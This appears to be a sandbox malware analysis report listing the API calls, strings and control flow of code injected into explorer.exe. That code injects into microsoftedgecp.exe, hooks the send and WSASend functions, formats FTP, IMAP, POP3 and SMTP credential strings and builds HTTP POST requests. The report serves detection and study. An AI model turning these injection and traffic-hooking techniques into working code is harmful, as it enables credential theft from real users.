                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 168 2f02861-2f02871 GetProcessHeap RtlAllocateHeap
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000A000,02F010CC), ref: 02F02864
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02F0286B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357844191-0
                                                                                                                            • Opcode ID: 5a58a4d1c1fd969c237e760ed17ee9523eb0caadd3aeea5a709eed7a823726bf
                                                                                                                            • Instruction ID: 1a65aa5b35538b148e49ce3a19c171a44216c1b556c527d5d3c602f383c9e410
                                                                                                                            • Opcode Fuzzy Hash: 5a58a4d1c1fd969c237e760ed17ee9523eb0caadd3aeea5a709eed7a823726bf
                                                                                                                            • Instruction Fuzzy Hash: 28A01271C81104BFDD4017A0A84DF05BA1CB740B45F008880710AC40448960005C8722

                                                                                                                            Non-executed Functions

                                                                                                                            Function 02F01819 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 208injectionnativesleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02F02608: VirtualQuery.KERNEL32(02F04434,?,0000001C), ref: 02F02615
                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,7622E800,microsoftedgecp.exe,?), ref: 02F0184E
                                                                                                                            • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02F01889
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02F01919
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,02F03428,00000016), ref: 02F01940
                                                                                                                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02F01968
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02F01978
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02F01992
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02F0199A
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F019A8
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F019AF
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02F019C5
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02F019CC
                                                                                                                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02F019E2
                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02F01A0C
                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02F01A1F
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F01A26
                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F01A2D
                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02F01A41
                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02F01A58
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F01A65
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F01A6B
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F01A71
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02F01A74
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                            • String ID: 0-8wP,8w$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                                            • API String ID: 1066286714-2452002656
                                                                                                                            • Opcode ID: 21f7aba6f6b535025ecdbb21d42d4df450e1f21d68f008d88a189bc97a9dd463
                                                                                                                            • Instruction ID: 8631cb0ae314c5452392a90a4890047308e013971b1cc433c50761ca348ae5b6
                                                                                                                            • Opcode Fuzzy Hash: 21f7aba6f6b535025ecdbb21d42d4df450e1f21d68f008d88a189bc97a9dd463
                                                                                                                            • Instruction Fuzzy Hash: 78618E71A45308AFE310DF659DC4E6BBBECFF897D8F000A59BA4993280D770D9048BA1
                                                                                                                            Function 02F0263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02F0265A
                                                                                                                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02F02672
                                                                                                                            • lstrlen.KERNEL32(?,00000000), ref: 02F0267A
                                                                                                                            • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02F02685
                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02F0269F
                                                                                                                            • wsprintfA.USER32 ref: 02F026B6
                                                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 02F026CF
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02F026D9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                            • String ID: %02X
                                                                                                                            • API String ID: 3341110664-436463671
                                                                                                                            • Opcode ID: f1e3251b2238b6ef6ff073e82fdb3261a9d825fdffc36260ba92bae6f0bffa78
                                                                                                                            • Instruction ID: 8bf74fd0840053741c35b433153d37e21d884a3af88476910118b9eb704f5208
                                                                                                                            • Opcode Fuzzy Hash: f1e3251b2238b6ef6ff073e82fdb3261a9d825fdffc36260ba92bae6f0bffa78
                                                                                                                            • Instruction Fuzzy Hash: 4B111971D4110CBFEB119B95EC88EAEBBBCFB48B85F1044A5F605E2144D6718E519B60
                                                                                                                            Function 02F01B17 Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 422 2f01b17-2f01b2c 423 2f01b60-2f01b68 422->423 424 2f01b2e 422->424 426 2f01bc3-2f01bcb 423->426 427 2f01b6a-2f01b6f 423->427 425 2f01b30-2f01b5e RtlMoveMemory 424->425 425->423 425->425 428 2f01c0b 426->428 429 2f01bcd-2f01bdf 426->429 430 2f01bbe-2f01bc1 427->430 433 2f01c0d-2f01c12 428->433 429->428 432 2f01be1-2f01bfe LdrProcessRelocationBlock 429->432 430->426 431 2f01b71-2f01b84 LoadLibraryA 430->431 435 2f01c15-2f01c17 431->435 436 2f01b8a-2f01b8f 431->436 432->428 434 2f01c00-2f01c04 432->434 434->428 437 2f01c06-2f01c09 434->437 435->433 438 2f01bb6-2f01bb9 436->438 437->428 437->432 439 2f01b91-2f01b95 438->439 440 2f01bbb 438->440 441 2f01b97-2f01b9a 439->441 442 2f01b9c-2f01b9f 439->442 440->430 443 2f01ba1-2f01bab GetProcAddress 441->443 442->443 443->435 444 2f01bad-2f01bb3 443->444 444->438
                                                                                                                            APIs
                                                                                                                            • RtlMoveMemory.NTDLL(?,?,?), ref: 02F01B4E
                                                                                                                            • LoadLibraryA.KERNEL32(?,02F04434,00000000,00000000,76232EE0,00000000,02F01910,?,?,?,00000001,?,00000000), ref: 02F01B76
                                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 02F01BA3
                                                                                                                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02F01BF4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3827878703-0
                                                                                                                            • Opcode ID: 8c593f8935ba08d92c8b95c8ca36aba7dbc0b705d18588137ea527557902fdad
                                                                                                                            • Instruction ID: f1880af11dcec869ea3abcc6a83fa8fe8c4c684b95407939219eee746b483273
                                                                                                                            • Opcode Fuzzy Hash: 8c593f8935ba08d92c8b95c8ca36aba7dbc0b705d18588137ea527557902fdad
                                                                                                                            • Instruction Fuzzy Hash: 10318475B00215ABCB24CF2DCCC4BA7B7E8BF05399B15856DE94AC7280E731E855DBA0
                                                                                                                            Function 02F01332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94libraryloadersleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02F02861: GetProcessHeap.KERNEL32(00000008,0000A000,02F010CC), ref: 02F02864
                                                                                                                              • Part of subcall function 02F02861: RtlAllocateHeap.NTDLL(00000000), ref: 02F0286B
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,02F0109E,?,02F01010), ref: 02F0134A
                                                                                                                            • GetCurrentProcessId.KERNEL32(00000003,?,02F0109E,?,02F01010), ref: 02F0135B
                                                                                                                            • wsprintfA.USER32 ref: 02F01372
                                                                                                                              • Part of subcall function 02F0263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02F0265A
                                                                                                                              • Part of subcall function 02F0263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02F02672
                                                                                                                              • Part of subcall function 02F0263E: lstrlen.KERNEL32(?,00000000), ref: 02F0267A
                                                                                                                              • Part of subcall function 02F0263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02F02685
                                                                                                                              • Part of subcall function 02F0263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02F0269F
                                                                                                                              • Part of subcall function 02F0263E: wsprintfA.USER32 ref: 02F026B6
                                                                                                                              • Part of subcall function 02F0263E: CryptDestroyHash.ADVAPI32(?), ref: 02F026CF
                                                                                                                              • Part of subcall function 02F0263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 02F026D9
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02F01389
                                                                                                                            • GetLastError.KERNEL32 ref: 02F0138F
                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 02F013A1
                                                                                                                              • Part of subcall function 02F024D5: GetCurrentProcessId.KERNEL32 ref: 02F024E7
                                                                                                                              • Part of subcall function 02F024D5: GetCurrentThreadId.KERNEL32 ref: 02F024EF
                                                                                                                              • Part of subcall function 02F024D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02F024FF
                                                                                                                              • Part of subcall function 02F024D5: Thread32First.KERNEL32(00000000,0000001C), ref: 02F0250D
                                                                                                                              • Part of subcall function 02F024D5: CloseHandle.KERNEL32(00000000), ref: 02F02566
                                                                                                                            • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 02F013B8
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02F013BF
                                                                                                                            • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 02F013E4
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02F013EB
                                                                                                                              • Part of subcall function 02F01DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 02F01E1D
                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 02F0141D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                                            • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                                            • API String ID: 706757162-1430290102
                                                                                                                            • Opcode ID: da3ba179f8027b43ea8db77472b7bea23ffbda4bc30753af53eab56888dd3827
                                                                                                                            • Instruction ID: 15bfe9049a7d5e23bcc94421dbc6d2fe7f7d08ce909ffa25b4d4808fe1d1d470
                                                                                                                            • Opcode Fuzzy Hash: da3ba179f8027b43ea8db77472b7bea23ffbda4bc30753af53eab56888dd3827
                                                                                                                            • Instruction Fuzzy Hash: 77318134B81218ABEB016FA19DCDF5B7B5ABF05BC5F004454FB0A961D4CB718821ABA1
                                                                                                                            Function 02F01647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91stringnetworkCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 236 2f01647-2f0165a 237 2f01660-2f01662 236->237 238 2f01748-2f0174f 236->238 237->238 239 2f01668-2f0166b 237->239 239->238 240 2f01671-2f0167d lstrlen 239->240 241 2f01683-2f0168a lstrlen 240->241 242 2f01747 240->242 241->242 243 2f01690-2f016a8 getpeername 241->243 242->238 243->242 244 2f016ae-2f016ca inet_ntoa htons 243->244 244->242 245 2f016cc-2f016d4 244->245 246 2f016d6-2f016d9 245->246 247 2f01708 245->247 248 2f016f3-2f016f8 246->248 249 2f016db-2f016de 246->249 250 2f0170d-2f0173c call 2f02861 wsprintfA call 2f024ae 247->250 248->250 251 2f016e0-2f016e3 249->251 252 2f01701-2f01706 249->252 250->242 260 2f0173e-2f01745 call 2f02843 250->260 254 2f016e5-2f016ea 251->254 255 2f016fa-2f016ff 251->255 252->250 254->248 257 2f016ec-2f016f1 254->257 255->250 257->242 257->248 260->242
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                                            • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                                            • API String ID: 3379139566-1703351401
                                                                                                                            • Opcode ID: 1b9e9d0bda6b2de0e5d253f9b47ef17b204213efaf5610ef58119445f1af33a6
                                                                                                                            • Instruction ID: 1fadb1d374034880361c1c268d60976c17b5234d0fad76e87ae3a1f275cb45b3
                                                                                                                            • Opcode Fuzzy Hash: 1b9e9d0bda6b2de0e5d253f9b47ef17b204213efaf5610ef58119445f1af33a6
                                                                                                                            • Instruction Fuzzy Hash: 6A21BA36E0020DA79F115FE98DC857FBAA9AB453C5B0440B5DB0CD3184D730D910EB60
                                                                                                                            Function 02F01752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 268 2f01752-2f01774 GetModuleHandleA GetProcAddress 269 2f017c1-2f017c6 268->269 270 2f01776-2f017c0 RtlZeroMemory * 4 268->270 270->269
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,02F01539,?,?,?,02F0144B,?), ref: 02F01763
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02F0176A
                                                                                                                            • RtlZeroMemory.NTDLL(02F04228,00000104), ref: 02F01788
                                                                                                                            • RtlZeroMemory.NTDLL(02F04118,00000104), ref: 02F01790
                                                                                                                            • RtlZeroMemory.NTDLL(02F04330,00000104), ref: 02F01798
                                                                                                                            • RtlZeroMemory.NTDLL(02F04000,00000104), ref: 02F017A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                                            • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                                            • API String ID: 1490332519-278825019
                                                                                                                            • Opcode ID: 02c64d8ffadb19b7be3ccb015a3c650dc3a7a65d4d19fcfc9dd8205cc4cab757
                                                                                                                            • Instruction ID: 1f081dc3d55a467ff8dd25b79d489572f6e8bb8dbfd451bca2a1339ef9306ce8
                                                                                                                            • Opcode Fuzzy Hash: 02c64d8ffadb19b7be3ccb015a3c650dc3a7a65d4d19fcfc9dd8205cc4cab757
                                                                                                                            • Instruction Fuzzy Hash: F8F08962FC132C33B11032AB7DC6D47BF5CD955DEA3430191B70A731858995E80067B4
                                                                                                                            Function 02F024D5 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02F024E7
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02F024EF
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02F024FF
                                                                                                                            • Thread32First.KERNEL32(00000000,0000001C), ref: 02F0250D
                                                                                                                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02F0252C
                                                                                                                            • SuspendThread.KERNEL32(00000000), ref: 02F0253C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02F0254B
                                                                                                                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 02F0255B
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02F02566
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1467098526-0
                                                                                                                            • Opcode ID: c55f6c958d77448c7bca51d2bfc0c4220e399d89c29dc3f691572991d2d5518f
                                                                                                                            • Instruction ID: 7784609e3a687cfcc500455b822c4a5c4e72afb239a01c84067d78a416af0e15
                                                                                                                            • Opcode Fuzzy Hash: c55f6c958d77448c7bca51d2bfc0c4220e399d89c29dc3f691572991d2d5518f
                                                                                                                            • Instruction Fuzzy Hash: 0A11C271C46208EFD7109F60A89CF3FFBA4FF84B89F000959FA4182284D33094199BA6
                                                                                                                            Function 02F01F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 282 2f01f4a-2f01fa5 call 2f022b8 call 2f02861 call 2f027e2 call 2f02374 291 2f01fc0-2f01fcc 282->291 292 2f01fa7-2f01fbe 282->292 295 2f01fd0-2f01fd2 291->295 292->295 296 2f022a6-2f022b5 call 2f02843 295->296 297 2f01fd8-2f0200f RtlZeroMemory 295->297 301 2f02015-2f02030 297->301 302 2f0229e-2f022a5 297->302 303 2f02062-2f02074 301->303 304 2f02032-2f02043 call 2f022e5 301->304 302->296 309 2f02078-2f0207a 303->309 310 2f02045-2f02054 304->310 311 2f02056 304->311 313 2f02080-2f020dc call 2f02731 309->313 314 2f0228b-2f02291 309->314 312 2f02058-2f02060 310->312 311->312 312->309 322 2f020e2-2f020e7 313->322 323 2f02284 313->323 315 2f02293-2f02295 call 2f02843 314->315 316 2f0229a 314->316 315->316 316->302 324 2f02101-2f0212f call 2f02861 wsprintfW 322->324 325 2f020e9-2f020fa 322->325 323->314 328 2f02131-2f02133 324->328 329 2f02148-2f0215f 324->329 325->324 330 2f02134-2f02137 328->330 335 2f02161-2f02197 call 2f02861 wsprintfW 329->335 336 2f0219e-2f021b8 329->336 331 2f02142-2f02144 330->331 332 2f02139-2f0213e 330->332 331->329 332->330 334 2f02140 332->334 334->329 335->336 340 2f02261-2f02277 call 2f02843 336->340 341 2f021be-2f021d1 336->341 349 2f02280 340->349 350 2f02279-2f0227b call 2f02843 340->350 341->340 344 2f021d7-2f021ed call 2f02861 341->344 351 2f021ef-2f021fa 344->351 349->323 350->349 353 2f021fc-2f02209 call 2f02826 351->353 354 2f0220e-2f02225 351->354 353->354 358 2f02227 354->358 359 2f02229-2f02236 354->359 358->359 359->351 360 2f02238-2f0223c 359->360 361 2f02256-2f0225d call 2f02843 360->361 362 2f0223e 360->362 361->340 363 2f0223e call 2f02815 362->363 365 2f02243-2f02250 RtlMoveMemory 363->365 365->361
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02F02861: GetProcessHeap.KERNEL32(00000008,0000A000,02F010CC), ref: 02F02864
                                                                                                                              • Part of subcall function 02F02861: RtlAllocateHeap.NTDLL(00000000), ref: 02F0286B
                                                                                                                              • Part of subcall function 02F027E2: lstrlen.KERNEL32(02F040DA,?,00000000,00000000,02F01F86,76228A60,02F040DA,00000000), ref: 02F027EA
                                                                                                                              • Part of subcall function 02F027E2: MultiByteToWideChar.KERNEL32(00000000,00000000,02F040DA,00000001,00000000,00000000), ref: 02F027FC
                                                                                                                              • Part of subcall function 02F02374: RtlZeroMemory.NTDLL(?,00000018), ref: 02F02386
                                                                                                                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 02F01FE2
                                                                                                                            • wsprintfW.USER32 ref: 02F0211B
                                                                                                                            • wsprintfW.USER32 ref: 02F02186
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02F02250
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                            • API String ID: 4204651544-1701262698
                                                                                                                            • Opcode ID: 8ff8626580ad10fb7485a7877493cfb84ef5961f2384a3daef42bb63c37e6684
                                                                                                                            • Instruction ID: 9092dc84775a44b799445d402158fa4de3690972ec5c4a7d3c97386d40cece59
                                                                                                                            • Opcode Fuzzy Hash: 8ff8626580ad10fb7485a7877493cfb84ef5961f2384a3daef42bb63c37e6684
                                                                                                                            • Instruction Fuzzy Hash: CAA15E71A09305AFE7109F64D8C8E2BBBE9BB88784F10492DFA45D3291DB70D9049B62
                                                                                                                            Function 02F025AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 367 2f025ad-2f025c9 OpenProcess 368 2f02600-2f02607 367->368 369 2f025cb-2f025da IsWow64Process 367->369 370 2f025f7 369->370 371 2f025dc-2f025ec IsWow64Process 369->371 372 2f025f9-2f025fa CloseHandle 370->372 371->372 373 2f025ee-2f025f5 371->373 372->368 373->372
                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,7622E800,?,?,microsoftedgecp.exe,02F01287), ref: 02F025BF
                                                                                                                            • IsWow64Process.KERNEL32(000000FF,?), ref: 02F025D1
                                                                                                                            • IsWow64Process.KERNEL32(00000000,?), ref: 02F025E4
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02F025FA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                            • String ID: microsoftedgecp.exe
                                                                                                                            • API String ID: 331459951-1475183003
                                                                                                                            • Opcode ID: a8ce12b932cff7cde55cada4657c2e5da4cbadee2067f130ded43959c543db99
                                                                                                                            • Instruction ID: 825d3c5efe3eb59415c6c5ace5cdd8612a81ced41429a5fcec473fe075409eaf
                                                                                                                            • Opcode Fuzzy Hash: a8ce12b932cff7cde55cada4657c2e5da4cbadee2067f130ded43959c543db99
                                                                                                                            • Instruction Fuzzy Hash: ABF06272D4261CFF9B108F9099D8DBFB76CEB01699B140299EA0092280D7314F04E6A4

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:8.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:9
                                                                                                                            Total number of Limit Nodes:2
                                                                                                                            execution_graph 761 5c9fab 762 5c9fd8 761->762 764 5c9ff8 761->764 765 5ca048 762->765 769 5ca04d 765->769 766 5ca135 LoadLibraryA 766->769 767 5ca190 VirtualProtect VirtualProtect 768 5ca1e8 767->768 768->768 769->766 769->767 770 5ca185 769->770 770->764

                                                                                                                            Callgraph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            • Opacity -> Relevance
                                                                                                                            • Disassembly available
